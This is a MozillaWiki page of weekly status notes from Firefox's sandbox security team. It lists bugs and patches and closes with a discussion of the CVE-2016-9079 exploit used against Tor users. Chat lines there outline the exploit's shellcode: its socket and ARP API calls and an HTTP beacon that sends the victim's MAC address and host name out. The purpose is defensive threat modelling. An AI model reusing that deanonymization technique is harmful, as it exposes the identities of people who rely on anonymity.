Security/Sandbox/2016-12-01

From MozillaWiki
Jump to: navigation, search

« previous week | index | next week »

bobowen

  • bug 1147911 - Use a separate content process for file:// URLs
    • landed - working on follow-ups
  • bug 1279699 - Crash in OOM | large | mozalloc_abort | mozalloc_handle_oom | moz_xmalloc | std::_Allocate | std::basic_stringbuf<T>::overflow
    • landed fix to use temporary files instead.
    • uplifted to beta, but seems to have caused / uncovered crashes later on - investigating now.
  • bug 1273372 - [EME] Crash in mozilla::gmp::GMPChild::ProcessingError - (Applocker)
    • have patches for this that seem to work for reporter - need to get them up for review

tedd

  • bug 1104619 - Audio remoting
    • Had to rewrite a lot of code
    • Talked to billm, implementing his suggestions, move away from PBackground, implement my own top-level protocol
  • bug 1320085 - Fedora 26 prlimit64 issue - reviewed patch

aklotz

  • bug 1319640 - a11y+e10s+sandboxing+plugins = fun. Had to remote a call to AccessibleObjectFromWindow. r+, should land today

gcp

  • bug 1284912 2.88% ts_paint (linux64) regression on push 23140396a80eb27ff586c41fdc1cad62c875c9b1 (Tue Jul 5 2016)
  • Lots of investigation on Talos
  • bug 1309205 - "Print to file" fails silently on Ubuntu16.04LTS feedback from font people

haik

  • bug 1314056 - Enable Mac content sandbox level 1 in 52
    • Uplifted to Aurora (along with all dependencies)
  • bug 1309394 - Introduce automated tests to validate content process sandboxing works as intended
    • Got review comments from Bob, looking into using ContentTask.spawn instead
  • bug 1321053 - my cannon pixma printer will no longer print in grayscale, it will with safari, this is not a printer problem
    • Seems to be fixed already by remote printing for Mac, need to root cause

handyman

  • bug 1315325 - Add telemetry to measure use of NPAPI NPN Get/Post URL apis
    • review
  • bug 1185472 - Only allow NPAPI HWNDs to be adopted by an HWND in the chrome process.
    • review
  • bug 1284897 - 64 bit Flash Player has storage permissions issues
    • review
  • bug 1273091 - Mouse cursor does not disappear in html5 fullscreen video on Windows
    • landed
    • waiting for regressions. If none, uplift to Aurora/Beta

jld

  • bug 1320085 - Deal with using prlimit64 to implement getrlimit: landed
  • bug 1257361: wrote patch
  • bug 1320834 - restrict prctl for desktop: filed and investigated
    • (dup of bug 1302714?, should mark 1302714 as dup of this one, you have more information)
    • (Oops. —jld)

round table

  • sandbox meet up in Hawaii ---> Wednesday @ 1pm
    • discussion points / goals
    • other people we might want to meet with? (gfx?)
  • Friday security meeting / standups
  • dinner in Hawaii? We have a stipend to spend and there are a number of restaurants.
  • bug 1286865 - non-fatal sandbox violation reporting
    • What does Chrome do?
  • Network isolation blockers?
    • Tests — Linux only, or all platforms?
    • PulseAudio.
    • What controls net access on Windows?
  • haik PTO

exploit CVE-2016-9079

<gcp> https://paste.sh/ShvF8IRP#o2CC1uJifewgaLtX1agM8r3w <gcp> annotated shellcode <gcp> LoadLibraryA <gcp> ws2_32_WSAStartup <gcp> ws2_32_WSASocketA <gcp> iphlpapi_SendARP <gcp> ; GET /0a821a80/05dc0212 HTTP/1.1 <gcp> ; Host: User-PC <gcp> ; Cookie: MC=08002703DFB8 <gcp> ; Accept-Encoding: gzip

  • Current Windows/Linux sandboxing wouldn't help deanonymization, but might interfere with modifying the exploit to leave a rootkit instead.
  • Mac sandbox already disallows network-outbound.
  • Threat models:
    • Network access bypassing Tor proxy
    • Obtaining PII somehow, exfiltrating via normal HTTP(S)

some "analysis" https://blog.gdatasoftware.com/2016/11/29346-firefox-0-day-targeting-tor-users (haven't looked at it yet, friend hinted me to it), not very in depth, but might be worth a read